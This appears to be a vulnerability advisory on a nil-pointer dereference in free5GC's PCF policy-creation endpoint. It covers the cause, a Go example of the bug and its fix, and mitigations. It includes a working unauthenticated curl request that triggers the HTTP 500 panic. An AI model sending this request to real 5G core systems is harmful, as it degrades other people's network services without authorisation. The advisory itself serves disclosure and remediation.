How the mentioned CVE works:
The vulnerability exists in free5GC’s Policy Control Function (PCF) POST handler (HandleCreateSmPolicyRequest) at /npcf-smpolicycontrol/v1/sm-policies. When the handler makes a downstream OpenAPI consumer call to the Unified Data Repository (UDR) and receives a 404 Not Found, the consumer wrapper returns both a non-nil `err` and a nil response struct. Instead of returning after logging the OpenAPI error, the handler continues execution and dereferences the nil response struct on the subsequent line, causing a nil-pointer dereference panic. The Gin web framework’s recovery middleware catches the panic behind the scenes, converting it into an `HTTP 500 Internal Server Error` with an empty body. The trigger is a single POST containing input that causes the downstream UDR lookup to fail (e.g., an unknown DNN). In affected versions (v4.1.0 and v4.2.1), this endpoint is also reachable without an `Authorization` header because the PCF route group is mounted without inbound authentication middleware. As a result, an unauthenticated attacker can cause the PCF to return `HTTP 500` instead of a controlled 4xx/5xx error whenever the downstream lookup fails. The PCF process remains running, and the availability impact is limited to per-request degradation.
Platform: free5GC PCF
Version: v4.1.0, v4.2.1
Vulnerability: Nil Pointer Dereference
Severity: High
Date: 2026-05-07
Prediction: Patch available 2026-05-07
What Undercode Says:
Analytics
In the validation lab, an attacker can trigger this issue with a single crafted POST. The following command reproduces the panic:
curl -sS -X POST 'http://10.100.200.9:8000/npcf-smpolicycontrol/v1/sm-policies' \
  -H 'Content-Type: application/json' \
  -d '{
    "supi":"imsi-208930000000003",
    "pduSessionId":1,
    "dnn":"internet-bad",
    "sliceInfo":{"sst":1,"sd":"010203"},
    "servingNetwork":{"mcc":"208","mnc":"93"},
    "accessType":"3GPP_ACCESS",
    "notificationUri":"http://smf.free5gc.org:8000/npcf-smpolicycontrol/v1/notify"
  }'
To monitor the PCF container logs for the panic, use:
docker logs <pcf_container_name> | grep -E "panic|runtime error"
Exploit:
- A single unauthenticated POST request to the vulnerable endpoint where the `dnn` value is unknown to the UDR.
- The request causes the downstream OpenAPI call to return 404 Not Found, which triggers the nil-pointer dereference.
- The handler panics, and the Gin recovery middleware returns `HTTP 500 Internal Server Error` with an empty body.
Protection from this CVE
- Apply the upstream fix from free5gc/pcf62.
- Upgrade to a patched version of free5GC (post-v4.2.1).
- Implement proper error handling: after logging the OpenAPI error, the handler must return immediately instead of continuing to dereference the nil response.
- Use the provided patch or merge the relevant code changes that correct the exceptional branch handling.
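The fall-through described in the "How the mentioned CVE works" section and the early return required by the protection list, side by side as an added Go example (not free5GC code). `SmPolicyData`, `lookupUDR` and the `400` status chosen for the controlled error are stand-ins; `recover()` plays the role of Gin's recovery middleware.

```go
package main

import (
	"errors"
	"fmt"
	"net/http"
)

// Stand-in for the UDR response struct (hypothetical, not the free5GC type).
type SmPolicyData struct{ Dnn string }

var ErrNotFound = errors.New("404 Not Found")

// lookupUDR mimics the OpenAPI consumer wrapper: an unknown DNN yields a
// non-nil err together with a nil response struct.
func lookupUDR(dnn string) (*SmPolicyData, error) {
	if dnn == "internet" {
		return &SmPolicyData{Dnn: dnn}, nil
	}
	return nil, ErrNotFound
}

// vulnerableHandler logs the error but does not return, so the next line
// dereferences the nil struct. The deferred recover() stands in for Gin's
// recovery middleware and turns the panic into a 500 with no body.
func vulnerableHandler(dnn string) (status int) {
	defer func() {
		if r := recover(); r != nil {
			status = http.StatusInternalServerError
		}
	}()
	data, err := lookupUDR(dnn)
	if err != nil {
		fmt.Println("UDR lookup failed:", err) // logged, then falls through
	}
	_ = data.Dnn // nil-pointer dereference when err != nil
	return http.StatusCreated
}

// fixedHandler returns a controlled client error as soon as the downstream
// lookup fails, so the dereference is never reached. 400 is an illustrative
// choice; the point is that a status is chosen deliberately, not by recover().
func fixedHandler(dnn string) int {
	data, err := lookupUDR(dnn)
	if err != nil {
		fmt.Println("UDR lookup failed:", err)
		return http.StatusBadRequest
	}
	_ = data.Dnn
	return http.StatusCreated
}
```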
Impact:
- NULL pointer dereference (CWE-476) caused by improper handling of an exceptional branch (CWE-754).
- The Gin recovery middleware catches the panic, so the PCF process is NOT killed; other endpoints continue serving.
- Confidentiality: No impact (the response is `HTTP 500` with empty body).
- Integrity: No persistent impact (the panic occurs before any state mutation).
- Availability: Limited to per-request degradation – each malicious POST results in an `HTTP 500` instead of a controlled error response.
- Unauthenticated attackers can reach this endpoint via the route-group authentication gap (free5gc/free5gc844).
Sources:
Reported By: github.com